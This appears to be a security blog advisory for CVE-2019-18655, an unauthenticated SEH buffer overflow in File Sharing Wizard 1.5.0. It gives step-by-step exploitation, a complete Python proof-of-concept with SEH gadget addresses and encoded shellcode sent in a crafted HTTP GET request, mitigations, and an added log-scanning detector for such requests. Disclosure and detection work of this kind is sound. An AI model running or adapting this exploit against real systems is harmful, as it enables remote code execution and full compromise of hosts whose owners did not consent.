Friday, November 08, 2019

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET SEH BASED BUFFER OVERFLOW

After spending several hours analyzing multiple binaries for vulnerabilities, a Structured Exception Handler (SEH)-based buffer overflow vulnerability was identified in the File Sharing Wizard binary, version 1.5.0. An unauthenticated attacker is able to achieve remote code execution (RCE) by sending a specially crafted HTTP GET request containing a malicious payload in the request's URL.

This vulnerability stems from improper input validation and bounds checking in the application’s request handling routines. When the input exceeds the expected buffer size, the overflow overwrites the SEH chain, enabling arbitrary code execution.

The vulnerability resembles previously disclosed issues such as:

  • CVE-2019-17415

  • CVE-2019-16724

  • CVE-2010-2331

In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.

Exploitation Steps

An attacker can exploit the vulnerability through the following steps:

  1. Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.

  2. Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.

  3. Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.

  4. Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.

  5. Gain remote access via a command shell or reverse shell, with the same privileges as the running application.


A Proof of Concept (PoC) exploit is provided below:

#!/usr/bin/python
################### PoC ###################
# Written for Python 2: the payload mixes str and bytes literals and is sent as-is.
import socket
import os
import sys

# Bad chars: \x00\x20
#
# SEH value: 0x9090eb08 (JMP short)
#
# NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)

seh = '\x6d\x57\x37\x7c'
nseh = '\x90\x90\xeb\x08'

# Shellcode (encoded, avoiding the bad chars listed above)
buf = b""
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb"
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c"
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19"
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11"
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e"
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a"
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77"
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78"
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4"
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f"
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18"
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b"
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf"
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b"
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b"
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde"

# Padding up to the SEH record, then nSEH, SEH, a NOP sled, the shellcode and trailing padding
poc = 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949 - len(buf))
payload = 'GET //.:/' + poc + ' HTTP/1.0\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.216.135", 80))
s.send(payload)
s.close()

Recommended Mitigations:

  • Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.

  • Apply vendor patches or consider replacing the software if no fix is available.

  • Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.

  • Monitor logs and network traffic for anomalous GET requests targeting the service.
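The last two mitigations depend on being able to recognise an overflow attempt in traffic or logs. The following example is added here and is not part of the original advisory or the vendor's product: it scans constructed web-server log lines (a CLF-like format that is an assumption, as are the length and repeat-run thresholds) and flags request URIs that are oversized, contain a long padding-like run of one character, percent-decode to non-printable bytes, or begin with the `//.:/` prefix used in the PoC above. The decision logic is generic to this class of HTTP buffer-overflow traffic rather than specific to this product.

```python
import re
from urllib.parse import unquote

# Thresholds are assumptions for illustration; tune them to the service's real traffic.
MAX_URI_LEN = 1024    # legitimate file-sharing paths are far shorter than an overflow payload
REPEAT_RUN = 64       # a run of one character this long is characteristic of overflow padding
POC_PREFIX = "//.:/"  # path prefix used in the published PoC request line

# Constructed sample log lines in a CLF-like format (not taken from the product's own logs).
SAMPLE_LOG = [
    '172.16.216.1 - - [08/Nov/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '172.16.216.1 - - [08/Nov/2019:10:00:02 +0000] "GET /files/report.pdf HTTP/1.1" 200 90210',
    '172.16.216.1 - - [08/Nov/2019:10:00:03 +0000] "GET ' + POC_PREFIX + "A" * 1035
    + '%90%90%EB%08 HTTP/1.0" 400 0',
]

# Extracts the quoted request line: method, request URI and HTTP version.
REQUEST_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<version>HTTP/\d\.\d)"')
# Matches REPEAT_RUN or more consecutive copies of the same character.
REPEAT_RE = re.compile(r"(.)\1{%d,}" % (REPEAT_RUN - 1))


def inspect_request(line):
    """Return the reasons a logged request looks like overflow traffic (empty list if normal)."""
    m = REQUEST_LINE_RE.search(line)
    if not m:
        return ["request line could not be parsed"]
    uri = m.group("uri")
    reasons = []
    if len(uri) > MAX_URI_LEN:
        reasons.append("uri length %d exceeds %d" % (len(uri), MAX_URI_LEN))
    if REPEAT_RE.search(uri):
        reasons.append("run of %d or more identical characters (padding-like)" % REPEAT_RUN)
    # Percent-decode so encoded NOP/shellcode bytes become visible; surrogateescape keeps
    # undecodable raw bytes instead of discarding them.
    decoded = unquote(uri, errors="surrogateescape")
    if any(not (0x20 <= ord(c) <= 0x7E) for c in decoded):
        reasons.append("non-printable bytes in decoded path")
    if uri.startswith(POC_PREFIX):
        reasons.append("path begins with the PoC prefix %r" % POC_PREFIX)
    return reasons


def scan_log(lines):
    """Return (line_index, reasons) for every log line that inspect_request flags."""
    hits = []
    for i, line in enumerate(lines):
        reasons = inspect_request(line)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan_log(SAMPLE_LOG):
        print("line %d flagged: %s" % (i, "; ".join(reasons)))
```

Run against the constructed sample, only the third line is flagged, on all four criteria. In practice the length and repeat-run checks are the durable ones: they catch padding-heavy requests regardless of the specific path prefix or shellcode, whereas the `//.:/` prefix check is a narrow signature for this particular PoC.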

Conclusion

This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk due to its unauthenticated nature and potential for full system compromise.

Reporting Information:

CVE Identifier: CVE-2019-18655
CVSS Score: 9.8
Affected Versions: 
File Sharing Wizard v1.5.0
Product URL: https://file-sharing-wizard.soft112.com/
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-18655
Reported By: Armando Huesca Prida
Tested on: 
  • Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
  • Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601